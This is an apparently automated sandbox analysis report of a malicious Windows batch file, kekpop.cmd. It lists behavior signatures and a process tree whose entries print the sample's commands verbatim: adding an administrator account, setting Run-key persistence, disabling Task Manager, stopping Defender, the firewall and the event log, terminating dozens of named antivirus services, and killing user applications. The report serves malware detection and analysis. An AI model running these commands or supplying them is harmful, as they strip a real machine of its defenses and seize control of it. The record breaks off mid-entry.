4539abba5b497555fd5b7ab3275ea1894e698f826e8af2eb2cca83acdbcd88e2

Analysis

max time kernel
75s
max time network
49s
platform
windows7_x64
resource
win7-20220414-en
submitted
13/05/2022, 16:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kekpop.cmd
Size

47KB
MD5

f190183b6a6f55daa406c25cf5da66d8
SHA1

89168542e0cec21bbafeafe39361994194576f61
SHA256

ea81248fddbf9080018845bf7862b9ceb8ab942526c1adcf20030f043c57ad99
SHA512

e28483273e68945b12baf8319ddafc58a65e82883c79fec47add970429f7b8ac02d91b7f68612058c0530ae6bfd66af959a0f6222e09acc81e816ca34c3ec448

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_6759_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kekpop.cmd"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	reg.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1664	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1820	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%qBRee:~23	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1468	powershell.exe
1468	powershell.exe
1868	tskill.exe
1868	tskill.exe
1656	tskill.exe
1656	tskill.exe
560	tskill.exe
560	tskill.exe
1340	tskill.exe
1340	tskill.exe
1672	tskill.exe
1672	tskill.exe
1900	tskill.exe
1900	tskill.exe
812	tskill.exe
812	tskill.exe
1688	tskill.exe
1688	tskill.exe
968	tskill.exe
968	tskill.exe
1904	tskill.exe
1904	tskill.exe
1276	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1276	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1296 wrote to memory of 1988	1296	cmd.exe	28
PID 1296 wrote to memory of 1988	1296	cmd.exe	28
PID 1296 wrote to memory of 1988	1296	cmd.exe	28
PID 1296 wrote to memory of 1468	1296	cmd.exe	29
PID 1296 wrote to memory of 1468	1296	cmd.exe	29
PID 1296 wrote to memory of 1468	1296	cmd.exe	29
PID 1296 wrote to memory of 1564	1296	cmd.exe	30
PID 1296 wrote to memory of 1564	1296	cmd.exe	30
PID 1296 wrote to memory of 1564	1296	cmd.exe	30
PID 1564 wrote to memory of 1760	1564	net.exe	31
PID 1564 wrote to memory of 1760	1564	net.exe	31
PID 1564 wrote to memory of 1760	1564	net.exe	31
PID 1296 wrote to memory of 1608	1296	cmd.exe	32
PID 1296 wrote to memory of 1608	1296	cmd.exe	32
PID 1296 wrote to memory of 1608	1296	cmd.exe	32
PID 1296 wrote to memory of 1820	1296	cmd.exe	33
PID 1296 wrote to memory of 1820	1296	cmd.exe	33
PID 1296 wrote to memory of 1820	1296	cmd.exe	33
PID 1296 wrote to memory of 1628	1296	cmd.exe	34
PID 1296 wrote to memory of 1628	1296	cmd.exe	34
PID 1296 wrote to memory of 1628	1296	cmd.exe	34
PID 1296 wrote to memory of 1548	1296	cmd.exe	35
PID 1296 wrote to memory of 1548	1296	cmd.exe	35
PID 1296 wrote to memory of 1548	1296	cmd.exe	35
PID 1296 wrote to memory of 1532	1296	cmd.exe	38
PID 1296 wrote to memory of 1532	1296	cmd.exe	38
PID 1296 wrote to memory of 1532	1296	cmd.exe	38
PID 1296 wrote to memory of 1340	1296	cmd.exe	36
PID 1296 wrote to memory of 1340	1296	cmd.exe	36
PID 1296 wrote to memory of 1340	1296	cmd.exe	36
PID 1340 wrote to memory of 1772	1340	net.exe	39
PID 1340 wrote to memory of 1772	1340	net.exe	39
PID 1340 wrote to memory of 1772	1340	net.exe	39
PID 1296 wrote to memory of 1664	1296	cmd.exe	40
PID 1296 wrote to memory of 1664	1296	cmd.exe	40
PID 1296 wrote to memory of 1664	1296	cmd.exe	40
PID 1532 wrote to memory of 1700	1532	cmd.exe	41
PID 1532 wrote to memory of 1700	1532	cmd.exe	41
PID 1532 wrote to memory of 1700	1532	cmd.exe	41
PID 1296 wrote to memory of 1560	1296	cmd.exe	43
PID 1296 wrote to memory of 1560	1296	cmd.exe	43
PID 1296 wrote to memory of 1560	1296	cmd.exe	43
PID 1560 wrote to memory of 1868	1560	net.exe	44
PID 1560 wrote to memory of 1868	1560	net.exe	44
PID 1560 wrote to memory of 1868	1560	net.exe	44
PID 1296 wrote to memory of 700	1296	cmd.exe	45
PID 1296 wrote to memory of 700	1296	cmd.exe	45
PID 1296 wrote to memory of 700	1296	cmd.exe	45
PID 700 wrote to memory of 1012	700	net.exe	46
PID 700 wrote to memory of 1012	700	net.exe	46
PID 700 wrote to memory of 1012	700	net.exe	46
PID 1296 wrote to memory of 1840	1296	cmd.exe	47
PID 1296 wrote to memory of 1840	1296	cmd.exe	47
PID 1296 wrote to memory of 1840	1296	cmd.exe	47
PID 1840 wrote to memory of 1224	1840	net.exe	48
PID 1840 wrote to memory of 1224	1840	net.exe	48
PID 1840 wrote to memory of 1224	1840	net.exe	48
PID 1296 wrote to memory of 952	1296	cmd.exe	49
PID 1296 wrote to memory of 952	1296	cmd.exe	49
PID 1296 wrote to memory of 952	1296	cmd.exe	49
PID 1296 wrote to memory of 1072	1296	cmd.exe	50
PID 1296 wrote to memory of 1072	1296	cmd.exe	50
PID 1296 wrote to memory of 1072	1296	cmd.exe	50
PID 1296 wrote to memory of 1736	1296	cmd.exe	51

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1988	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\kekpop.cmd"
1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\kekpop.cmd
  2⤵
  - Views/modifies file attributes
  PID:1988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Set-ExecutionPolicy Unrestricted"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\system32\net.exe
  net localgroup administrators session /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:1760
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_6759_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\kekpop.cmd /f
  2⤵
  - Adds Run key to start application
  PID:1608
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1820
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  PID:1628
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:1548
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1400
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1620
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1728
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1056
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im "MSASCui.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- C:\Windows\system32\net.exe
  net stop "wuauserv"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wuauserv"
    3⤵
    PID:1868
- C:\Windows\system32\net.exe
  net stop "security center"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "security center"
    3⤵
    PID:1012
- C:\Windows\system32\net.exe
  net stop sharedaccess
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sharedaccess
    3⤵
    PID:1224
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode-disable
  2⤵
  PID:952
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1072
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1736
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:668
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1668
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1120
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1996
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1180
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1808
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:940
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1608
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1176
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1664
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1156
- C:\Windows\system32\net.exe
  net stop "Security Center" /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Security Center" /y
    3⤵
    PID:1276
- C:\Windows\system32\net.exe
  net stop "Automatic Updates" /y
  2⤵
  PID:1896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Automatic Updates" /y
    3⤵
    PID:1348
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:1448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:1396
- C:\Windows\system32\net.exe
  net stop "SAVScan" /y
  2⤵
  PID:1504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAVScan" /y
    3⤵
    PID:1556
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Firewall Monitor Service" /y
  2⤵
  PID:1620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
    3⤵
    PID:468
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto-Protect Service" /y
  2⤵
  PID:1604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
    3⤵
    PID:336
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:1340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:1068
- C:\Windows\system32\net.exe
  net stop "McAfee Spamkiller Server" /y
  2⤵
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
    3⤵
    PID:1900
- C:\Windows\system32\net.exe
  net stop "McAfee Personal Firewall Service" /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
    3⤵
    PID:812
- C:\Windows\system32\net.exe
  net stop "McAfee SecurityCenter Update Manager" /y
  2⤵
  PID:1896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
    3⤵
    PID:1076
- C:\Windows\system32\net.exe
  net stop "Symantec SPBBCSvc" /y
  2⤵
  PID:1448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
    3⤵
    PID:936
- C:\Windows\system32\net.exe
  net stop "Ahnlab Task Scheduler" /y
  2⤵
  PID:1504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
    3⤵
    PID:1468
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:1676
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1732
- C:\Windows\system32\net.exe
  net stop vrmonsvc /y
  2⤵
  PID:1068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vrmonsvc /y
    3⤵
    PID:1340
- C:\Windows\system32\net.exe
  net stop MonSvcNT /y
  2⤵
  PID:560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MonSvcNT /y
    3⤵
    PID:1900
- C:\Windows\system32\net.exe
  net stop SAVScan /y
  2⤵
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVScan /y
    3⤵
    PID:1688
- C:\Windows\system32\net.exe
  net stop NProtectService /y
  2⤵
  PID:812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NProtectService /y
    3⤵
    PID:1904
- C:\Windows\system32\net.exe
  net stop ccSetMGR /y
  2⤵
  PID:968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMGR /y
    3⤵
    PID:1076
- C:\Windows\system32\net.exe
  net stop ccEvtMGR /y
  2⤵
  PID:1896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMGR /y
    3⤵
    PID:1716
- C:\Windows\system32\net.exe
  net stop srservice /y
  2⤵
  PID:936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop srservice /y
    3⤵
    PID:1448
- C:\Windows\system32\net.exe
  net stop "Symantec Network Drivers Service" /y
  2⤵
  PID:1836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
    3⤵
    PID:1468
- C:\Windows\system32\net.exe
  net stop "norton Unerase Protection" /y
  2⤵
  PID:1504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton Unerase Protection" /y
    3⤵
    PID:1744
- C:\Windows\system32\net.exe
  net stop MskService /y
  2⤵
  PID:1676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MskService /y
    3⤵
    PID:1620
- C:\Windows\system32\net.exe
  net stop MpfService /y
  2⤵
  PID:1732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MpfService /y
    3⤵
    PID:1604
- C:\Windows\system32\net.exe
  net stop mcupdmgr.exe /y
  2⤵
  PID:1340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mcupdmgr.exe /y
    3⤵
    PID:1068
- C:\Windows\system32\net.exe
  net stop "McAfeeAntiSpyware" /y
  2⤵
  PID:1900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
    3⤵
    PID:560
- C:\Windows\system32\net.exe
  net stop helpsvc /y
  2⤵
  PID:1688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop helpsvc /y
    3⤵
    PID:1672
- C:\Windows\system32\net.exe
  net stop ERSvc /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ERSvc /y
    3⤵
    PID:812
- C:\Windows\system32\net.exe
  net stop "*norton*" /y
  2⤵
  PID:1076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*norton*" /y
    3⤵
    PID:968
- C:\Windows\system32\net.exe
  net stop "*Symantec*" /y
  2⤵
  PID:1716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*Symantec*" /y
    3⤵
    PID:1896
- C:\Windows\system32\net.exe
  net stop "*McAfee*" /y
  2⤵
  PID:1448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*McAfee*" /y
    3⤵
    PID:936
- C:\Windows\system32\net.exe
  net stop ccPwdSvc /y
  2⤵
  PID:1468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccPwdSvc /y
    3⤵
    PID:1836
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:1504
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:1676
- C:\Windows\system32\net.exe
  net stop "Serv-U" /y
  2⤵
  PID:1604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Serv-U" /y
    3⤵
    PID:1732
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:1068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:1340
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:1900
- C:\Windows\system32\net.exe
  net stop "Symantec AntiVirus Client" /y
  2⤵
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
    3⤵
    PID:1688
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Server" /y
  2⤵
  PID:812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
    3⤵
    PID:1904
- C:\Windows\system32\net.exe
  net stop "NAV Alert" /y
  2⤵
  PID:968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NAV Alert" /y
    3⤵
    PID:1076
- C:\Windows\system32\net.exe
  net stop "Nav Auto-Protect" /y
  2⤵
  PID:1896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
    3⤵
    PID:1716
- C:\Windows\system32\net.exe
  net stop "McShield" /y
  2⤵
  PID:936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McShield" /y
    3⤵
    PID:1448
- C:\Windows\system32\net.exe
  net stop "DefWatch" /y
  2⤵
  PID:1836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "DefWatch" /y
    3⤵
    PID:1468
- C:\Windows\system32\net.exe
  net stop eventlog /y
  2⤵
  PID:1504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop eventlog /y
    3⤵
    PID:1744
- C:\Windows\system32\net.exe
  net stop InoRPC /y
  2⤵
  PID:1676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRPC /y
    3⤵
    PID:1620
- C:\Windows\system32\net.exe
  net stop InoRT /y
  2⤵
  PID:1732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRT /y
    3⤵
    PID:1604
- C:\Windows\system32\net.exe
  net stop InoTask /y
  2⤵
  PID:1340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoTask /y
    3⤵
    PID:1068
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:1900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:560
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:1688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:1672
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Corporate Edition" /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
    3⤵
    PID:812
- C:\Windows\system32\net.exe
  net stop "ViRobot Professional Monitoring" /y
  2⤵
  PID:1076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
    3⤵
    PID:968
- C:\Windows\system32\net.exe
  net stop "PC-cillin Personal Firewall" /y
  2⤵
  PID:1716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
    3⤵
    PID:1896
- C:\Windows\system32\net.exe
  net stop "Trend Micro Proxy Service" /y
  2⤵
  PID:1448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
    3⤵
    PID:936
- C:\Windows\system32\net.exe
  net stop "Trend NT Realtime Service" /y
  2⤵
  PID:1468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
    3⤵
    PID:1836
- C:\Windows\system32\net.exe
  net stop "McAfee.com McShield" /y
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com McShield" /y
    3⤵
    PID:1504
- C:\Windows\system32\net.exe
  net stop "McAfee.com VirusScan Online Realtime Engine" /y
  2⤵
  PID:1348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
    3⤵
    PID:1868
- C:\Windows\system32\net.exe
  net stop "SyGateService" /y
  2⤵
  PID:1340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SyGateService" /y
    3⤵
    PID:560
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1672
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus" /y
  2⤵
  PID:1688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
    3⤵
    PID:812
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus Network" /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
    3⤵
    PID:968
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Job Server" /y
  2⤵
  PID:1076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
    3⤵
    PID:1896
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Realtime Server" /y
  2⤵
  PID:1716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
    3⤵
    PID:936
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1836
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus RPC Server" /y
  2⤵
  PID:1468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
    3⤵
    PID:1400
- C:\Windows\system32\net.exe
  net stop netsvcs
  2⤵
  PID:1136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop netsvcs
    3⤵
    PID:1744
- C:\Windows\system32\net.exe
  net stop spoolnt
  2⤵
  PID:1748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop spoolnt
    3⤵
    PID:1732
- C:\Windows\system32\tskill.exe
  tskill iexplore
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1868
- C:\Windows\system32\tskill.exe
  tskill msnmsgr
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1656
- C:\Windows\system32\tskill.exe
  tskill excel
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:560
- C:\Windows\system32\tskill.exe
  tskill iTunes
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1340
- C:\Windows\system32\tskill.exe
  tskill calc
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1672
- C:\Windows\system32\tskill.exe
  tskill msaccess
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1900
- C:\Windows\system32\tskill.exe
  tskill safari
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:812
- C:\Windows\system32\tskill.exe
  tskill mspaint
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1688
- C:\Windows\system32\tskill.exe
  tskill outlook
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:968
- C:\Windows\system32\tskill.exe
  tskill WINWORD
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1904
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\ApproveSkip.ps1
  2⤵
  PID:1896
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\CloseDismount.clr
  2⤵
  PID:1076
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\CloseSet.WTV
  2⤵
  PID:936
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\ConfirmConvertTo.ps1
  2⤵
  PID:1716
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\ConnectGroup.ppsm
  2⤵
  PID:468
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\ExportTrace.xht
  2⤵
  PID:1056
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\InitializeCompress.docx
  2⤵
  PID:1224
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\InstallBlock.xps
  2⤵
  PID:2016
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\InvokeReset.wmf
  2⤵
  PID:1676
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\LimitRevoke.jpe
  2⤵
  PID:1504
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\NewLimit.3gp
  2⤵
  PID:1604
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\NewMount.easmx
  2⤵
  PID:1620
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\OpenGroup.wmv
  2⤵
  PID:1348
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RedoRemove.MOD
  2⤵
  PID:1276
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RepairExport.xlsx
  2⤵
  PID:560
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\ResolveConvertFrom.rmi
  2⤵
  PID:1340
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\RestartApprove.aiff
  2⤵
  PID:1672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\SplitMeasure.pptx
  2⤵
  PID:1900
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\UndoRepair.wav
  2⤵
  PID:812
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Desktop\UnregisterCheckpoint.exe
  2⤵
  PID:1688
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\Are.docx
  2⤵
  PID:968
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Documents\black.bat
  2⤵
  PID:1904
- C:\Windows\system32\xcopy.exe
